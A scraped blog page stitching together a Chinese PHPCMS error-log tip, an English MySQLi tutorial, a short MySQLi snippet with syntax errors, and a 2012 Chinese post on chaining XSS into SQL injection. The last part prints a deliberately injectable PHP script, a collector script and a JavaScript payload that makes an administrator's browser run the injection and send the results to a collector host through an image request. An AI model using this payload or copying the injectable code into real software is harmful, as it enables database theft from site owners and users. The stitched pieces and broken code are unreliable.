2013年4月25日星期四

[教程] PHPCMS教程:PHP错误日志


错误日志的记录,可以帮助开发人员或者治理人员查看系统是否存在问题。在调试的时候可开启此功能。

建议不开启,影响速度。

一、开启错误日志

修改修改文件 根目录下面的 config.inc.php 文件,

找到 $CONFIG['enablephplog'] = '0'; //是否启用php错误日志

修改为:

$CONFIG['enablephplog'] = '1'; //是否启用php错误日志

二、查看错误日志

系统设置--系统工具 --php 错误日志

级别为:Notice 错误 为正常。

级别为: E_ERROR | E_WARNING | E_PARSE 中的任何一个,表示存在问题。



phpcms v9错误日志记录怎样清理?????????

直接删除error_log.php文件就可以了

MySQLi for Beginners

Introduction

Nearly every site that you visit nowadays has some sort of database storage in place, many sites opt to use MySQL databases when using PHP. However, many people haven't yet taken the step to interacting with databases properly in PHP. Here we guide you through what you should be doing - using PHP's MySQLi class - with a hat-tip to the one way that you definitely shouldn't be doing it.

The Wrong Way

If you're using a function called mysql_connect() or mysql_query() you really need to take note and change what you're doing. I understand that it's not easy to change current large projects, but look to change future ones.
Any of the functions that are prefixed with mysql_ are now being discouraged by PHP themselves as visible on this doc page, instead you should look to use one of the following:
  • MySQLi - The i standing for 'improved'.
  • PDO
Each has its advantages, PDO for example will work with various different database systems, where as MySQLi will only work with MySQL databases. Both are object oriented, but MySQLi allows procedural usage as well. There are other minor differences between the two, but it's up to you to choose which you want to use, here we'll be looking at MySQLi.

PHP MySQLi

Here we'll mostly be looking at the object oriented implementation, however, there is no reason you can't use this in a procedural format, but again no reason you shouldn't use the OO implementation.

Connecting

Connecting is as simple as just instantiating a new instance of MySQLi, we'll be using a username of user with a password of pass connecting to the demo database on the localhosthost:
$db = new mysqli('localhost', 'user', 'pass', 'demo');

if($db->connect_errno > 0){
    die('Unable to connect to database [' . $db->connect_error . ']');
}
Obviously, the database name is optional and can be omitted. If you omit the database name you must be sure to prefix your tables with the database in all of your queries.

Querying

Let's go ahead and pull out all of the users from the users table where they have live = 1:
$sql = <<<SQL
    SELECT *
    FROM `users`
    WHERE `live` = 1 
SQL;

if(!$result = $db->query($sql)){
    die('There was an error running the query [' . $db->error . ']');
}
We now have a variable that contains a mysqli_result object, we can now go ahead and do various things with this such as looping through the results, displaying how many there are and freeing the result.

Output query results

To loop through the results and output the username for each row on a new line we'd do the following:
while($row = $result->fetch_assoc()){
    echo $row['username'] . '<br />';
}
As you can see from this, the syntax isn't too dissimilar to the old mysql_ syntax that you're probably used to, this is just better and improved!

Number of returned rows

Each mysqli_result object that is returned has a variable defined which is called $num_rows, so all we need to do is access that variable by doing:
<?php
echo 'Total results: ' . $result->num_rows;
?>

Number of affected rows

When running an UPDATE query you sometimes want to know how many rows have been updated, or deleted if running a DELETE query, this is a variable which is inside the mysqliobject.
<?php
echo 'Total rows updated: ' . $db->affected_rows;
?>

Free result

It's advisable to free a result when you've finished playing with the result set, so in the above example we should put the following code after our while() loop:
$result->free();
This will free up some system resources, and is a good practice to get in the habit of doing.

Escaping characters

When inserting data into a database, you'll have been told (I hope) to escape it first, so that single quotes get preceeded be a backslash. This will mean that any quotes won't break out of any that you use in your SQL. This is still the case - and you should look to use the below method:
$db->real_escape_string('This is an unescaped "string"');
However, because this is a commonly used function, there is an alias function that you can use which is shorter and less to type:
$db->escape_string('This is an unescape "string"');
This string should now be safer to insert into your database through a query.

Close that connection

Don't forget, when you've finished playing with your database to make sure that you close the connection:
$db->close();

Prepared Statements

Prepared statements are complex to get your head around, but are really useful and can help alleviate a lot of the potential issues that you might have with escaping. Prepared statements basically work by you playing a ? where you want to substitute in a string,integerblob or double. Prepared statements don't substitute the value into the SQL so the issues with SQL injections are mostly removed.

Define a statement

Let's try to grab all of the users from the users table where they have a username of bob. We'd firstly define the SQL statement that we'd use:
$statment = $db->prepare("SELECT `name` FROM `users` WHERE `username` = ?");
That question mark there is what we're going to be assigning the word 'bob' to.

Bind parameters

We simply use the method bind_param to bind a parameter. You must specify the type as the first parameter then the variable as the second - so for instance we'd use s as the first parameter (for string), and our $name variable as the second:
$name = 'Bob';
$statement->bind_param('s', $name);
If we had 3 parameters to bind which are of varying types we could use bind_param('sdi', $name, $height, $age); for example. Note the types are not separated at all as the first parameter.

Execute the statement

No fuss, no mess, just execute the statement so that we can play with the result:
$statement->execute();

Iterating over results

Firstly we'll bind the result to variables, we do this using the bind_result() method which allow us specify some variables to assign the result to. So if we assign the returned name to the variable $returned_name we'd use:
$statement->bind_result($returned_name);
As before, if you have multiple variables to assign, just comma separate them - simple as that.
Now we have to actually fetch the results, this is just as simple as the earlier mysqli requests that we were doing - we'd use the method fetch(), which returns will assign the returned values into the binded variables - if we'd binded some.
while($statement->fetch()){
    echo $returned_name . '<br />';
}

Close statement

Don't forget to forgo a few seconds of your time to free the result - keep your code neat, clean and lean:
$statement->free_result();

MySQLi Transactions

One of the major improvements that MySQLi brings is the ability to use transactions. A transaction is a group of queries that execute but don't save their effects in the database. The advantage of this is if you have 4 inserts that all rely on each other, and one fails, you can roll back the others so that none of the data is inserted, or if updating fields relies on fields being inserted correctly.
You need to ensure that the database engine that you're using supports transactions.

Disable auto commit

Firstly you need to make it so that any query you submit doesn't automatically commit in the database. It's a simple one line boolean value:
$db->autocommit(FALSE);

Commit the queries

After a few queries that you've ran using $db->query() we can call a simple function to commit the transaction:
$db->commit();
Pretty simple stuff so far, and it's meant to be easy and approachable so that you have no reason to not use it.

Rollback

Just as easy as it is to commit something, it's just as simple to roll something back:
$db->rollback();
Take a look at the PHP documentation for an example of how to use rollbacks. I personally haven't found a scenario where I would use them, but they're worth knowing about so that you are aware they're there to be used.

Final Thoughts

Using mysql_ functions is a foolish move to make, don't use these outdated and useless methods because they're easier, or quicker. Man up and tackle one of the new forms of database interaction - MySQLi or PDO - you'll make @mfrost503 happier, and have better code too.

PHP and MySQLi quick tutorial / how to example



Here is a quick tutorial to get  you up in running with mysqli

<?php


// CONNECT TO THE DATABASE
$DB_NAME = 'DATABASE_NAME';
$DB_HOST = 'DATABASE_HOST';
$DB_USER = 'DATABASE_USER';
$DB_PASS = 'DATABASE_PASSWORD';
$mysqli = new mysqli($DB_HOST, $DB_USER, $DB_PASS, $DB_NAME);
if (mysqli_connect_errno()) {
printf("Connect failed: %s\n"mysqli_connect_error());
exit();
}

// A QUICK QUERY ON A FAKE USER TABLE
$query = "SELECT * FROM `users` WHERE `status`='bonkers'";
$result = $mysqli->query($query) or die($mysqli->error.__LINE__);

// GOING THROUGH THE DATA
if($result->num_rows > 0{
while($row $result->fetch_assoc()) {
echo stripslashes($row['username']);
}
}
else {
echo 'NO RESULTS';
}
// CLOSE CONNECTION
mysqli_close($mysqli);

?>

This will work for 90% of your querying needs. 

PHPcms利用xss 执行sql注入



Date: 2012/8/3  Sort: HTML|CSS|JS|xss|xml824 Views / 3 Comments / 
昨天看见phpcms v9.1.15爆的xss和无权限的sql注入,于是就想测试下利用xss执行sql注入,虽然爆的这个phpcms漏洞还有很多其他的用法!但是,这个注入我没有找到phpcms v9.1.15测试,其他版本都没有测试成功!
于是乎我只有假想下一个极端环境:
1.前台有且只有一个xss漏洞(不能获取管理员cookie)
2.后台有且只有一个sql注入漏洞(注入漏洞文件只有管理员可以访问)
3.注入获得管理员密码可解密
4.除以上无其他任何漏洞(包括后台getwebshell)
其实我就是想说,我们只可以利用这个xss执行注入!

模拟注入漏洞代码
sqli.php
01<?php
02 @error_reporting (E_ALL & ~E_NOTICE & ~E_WARNING);//错误忽略
03 $con = mysql_connect("localhost","root","");
04 if(!$con) {die('Could not connect: ' . mysql_error());}
05 mysql_select_db("test",$con);
06 $id $_GET['xss'];
07 $sql "select id,realname from test where id="."$id";
08 $view = mysql_query($sql);
09 $row = mysql_fetch_array($view);
10 echo $row[id]."<br />";
11 echo $row[realname]."<br />";
12?>

mysql数据库:
1database:test
2table:test、admin
3column:test.id、test.realname
4             admin.id、admin.username、admin.password

get.php(获取的注入后数据截取)
1<?php
2 $file fopen("data.txt","a");
3 fwrite($file,$_GET['get']);
4 fclose($file);
5?>

xsssqli.js(payload)
01function addLoadEvent(func)//窗口打开加载多个函数
02{
03 var oldfunc=window.onload; //页面打开是加载方法
04    if(typeof(window.onload)!="function")
05    {
06     window.onload=func;
07    }
08    else
09    {
10     window.onload=function()
11     {
12      oldfunc();
13      func();
14      }
15     }
16}
17function get_xsssqli()
18{
20 var ajax = null;
21 if(window.XMLHttpRequest)
22 {
23  ajax = new XMLHttpRequest();
24 }
25 else if(window.ActiveXObject)
26 {
27  ajax = new ActiveXObject("Microsoft.XMLHTTP");//ie6和一下老版本
28 }
29 else
30 {
31  return;
32 }
33 ajax.open("GET", url, true);
34 ajax.send(null);
35 ajax.onreadystatechange = function()
36 {
37  if(ajax.readyState == 4 && ajax.status == 200)
38  {
39   var img = document.createElement("img");
40   img.src = "http://127.0.0.1/xss/get.php?get="+ajax.responseText;
41   document.body.appendChild(img);
42  }
43 }
44}
45addLoadEvent(get_xsssqli);

模拟xss漏洞
1<html>
2 <head>
3  <title>use xss to sqli</title>
4 </head>
5 <body>
6 <script src=http://127.0.0.1/xss/get.js ></script>
7 </body>
8</html>

最后成功得到数据:


当然你也可以写个正则截获指定数据!
转载请指明出处:L.N.博客  http://lanu.sinaapp.com/htmlcssjisxml/112.html